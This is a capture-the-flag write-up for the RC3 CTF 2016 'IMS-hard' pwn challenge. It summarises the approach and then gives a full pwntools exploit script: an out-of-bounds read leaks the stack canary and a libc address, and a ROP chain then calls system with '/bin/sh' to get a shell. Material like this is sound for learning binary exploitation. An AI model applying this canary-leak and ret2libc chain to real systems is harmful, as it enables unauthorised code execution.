[RC3 CTF_2016] IMS-hard(pwn)

## RC3 CTF_2016(IMS-hard,pwn,400pts)

[Summary]

1. OOB memory leak(stack) vuln -> canary leak, libc leak

2. NX, Stack Canary Bypass 

3. ROP exploit

4. Use libc-database -> libc version check

[Exploit Code]

from pwn import *
import base64
 
context(arch = 'i386',os='linux')
local=True
 
if local:
    p = process("./IMS-hard")
    libc = ELF("/lib/x86_64-linux-gnu/libc-2.19.so")
else:
    p = remote("ims.ctf.rc3.club",8888)
 
binary = ELF("./IMS-hard")
 
raw_input()
 
def send_add(id_param, code_param):
    p.recvuntil('Choose: '); p.send('1\n')
    p.recvuntil('ID: '); p.send(id_param + '\n')
    p.recvuntil('code: '); p.send(code_param + '\n')
def send_delete(id_param):
    p.recvuntil('Choose: '); p.send('2\n')
    p.recvuntil('delete: '); p.send(id_param + '\n')
def view_record(index):
    p.recvuntil('Choose: '); p.send('3\n')
    p.recvuntil('view: '); p.send(index + '\n')
    stack_leak = p.recvline()
    stack_leak = stack_leak[12:stack_leak.find(',')]
    #print '[*] wjdebug : ' + hex((int(stack_leak) & 0xffffffff))
    #print '[*] wjdebug : ' + hex(stack_leak)
    
    return stack_leak
 
for i in xrange(0,5):
    send_add('1094795585','BBBBCCCC')
 
############################ info leak ################################
popret_gadget = 0x08048a7c
libc_start_main_got = 0x08049fec
printf_got = 0x08049fc4
puts_plt = 0x08048560
puts_got = 0x08049fdc
fwrite_got = 0x08049fd8
 
puts_offset = 0x657e0
oneshot_gadget_offset = 0x4025b
system_offset = 0x40310
binsh_offset = 0x16084c
start_addr = 0x8048a7e
 
print '[INFO LEAK VULN]'
 
### info 1 ###
canary_leak = view_record('5')
canary_addr = hex(int(canary_leak) & 0xffffffff)
print '[*] stack_canary : ' + canary_addr
print '[*] stack_canary(dec) : ' + str(int(canary_addr,16))
 
#########################################################################
 
send_add(str(int(canary_addr,16)),'BBBBCCCC')            # canary control
send_add('1094795585','BBBBCCCC')                # garbage ('AAAABBBBCCCC')
send_add(str(puts_got),p32(puts_plt) + p32(popret_gadget))    # puts_plt + popret + puts_got
#send_add(str(printf_got),p32(puts_plt) + p32(popret_gadget))    # puts_plt + popret + printf_got
send_add('1094795585',p32(start_addr) + 'CCCC')        # _start addr
 
p.recvuntil('Choose: '); p.send('4\n')
 
 
puts_addr = u32(p.recv(4))
libc_base_addr = puts_addr - puts_offset
oneshot_gadget_addr = libc_base_addr + oneshot_gadget_offset
system_addr = libc_base_addr + system_offset
binsh_addr = libc_base_addr + binsh_offset
print '[*] puts_addr : ' + hex(puts_addr)
print '[*] libc_base_addr : ' + hex(libc_base_addr)
print '[*] oneshot_gadget_addr : ' + hex(oneshot_gadget_addr)
print '[*] system_addr : ' + hex(system_addr)
print '[*] binsh_addr : ' + hex(binsh_addr)
 
for i in xrange(0,9):
    send_delete('0')
for i in xrange(0,5):
    send_add('1094795585','BBBBCCCC')
 
send_add(str(int(canary_addr,16)),'BBBBCCCC')
send_add('1094795585','BBBBCCCC')
send_add(str(int(binsh_addr)),p32(system_addr) + 'CCCC')
 
p.recvuntil('Choose: '); p.send('4\n')
 
######################### libc version check #############################
#got_leak = p.recv(1024)
#puts_got = u32(got_leak[0:4]); #puts_got_addr = hex(int(puts_got) & 0xffffffff)
#printf_got = u32(got_leak[5:9]); #fwrite_got_addr = hex(int(fwrite_got) & 0xffffffff)
#print '[*] puts_got : ' + hex(puts_got)
#print '[*] printf_got : ' + hex(printf_got)
##########################################################################
 
p.interactive()
 
# ref) https://github.com/niklasb/libc-database
# dynELF study (https://gist.github.com/Inndy/a2c630a6e70d892758908915914cebfc)